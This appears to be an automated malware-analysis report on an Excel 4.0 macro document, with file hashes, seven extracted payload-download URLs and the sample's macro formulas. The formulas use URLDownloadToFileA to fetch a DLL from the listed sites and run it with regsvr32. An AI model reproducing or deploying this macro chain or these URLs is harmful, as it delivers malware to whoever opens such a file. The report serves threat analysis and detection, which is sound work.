General
-
Target
63f8b96bcc668ff9898553cb332fa8d2c18d90f8e386d71a1684429d6e483fa1
-
Size
38KB
-
MD5
ffbe9c5409f366da195e5f9e887ac4c8
-
SHA1
50036cb05319165c87ca76afee0762b1c5d78634
-
SHA256
63f8b96bcc668ff9898553cb332fa8d2c18d90f8e386d71a1684429d6e483fa1
-
SHA512
afc85414078ad52acabd86a621afdab42635effcb5f1e49923b234c11e0e39e07efa5f121b61f0c3b327b359a0132cc590e2e2ebcc6d4eb467863d0bcc058ee7
-
SSDEEP
768:6mcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:6mqTeSOZZ1ZYpoQ/pMAeVIyTCR
Malware Config
Extracted
https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
https://damjangro.org/data/IlBcH2mM/
https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
https://www.awam.be/wp-admin/ug9Zz/
https://protokol.mx/Archivos/SjKWNoeYre/
https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
https://bengtverhoef.nl/stats/SJ1csD7/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
63f8b96bcc668ff9898553cb332fa8d2c18d90f8e386d71a1684429d6e483fa1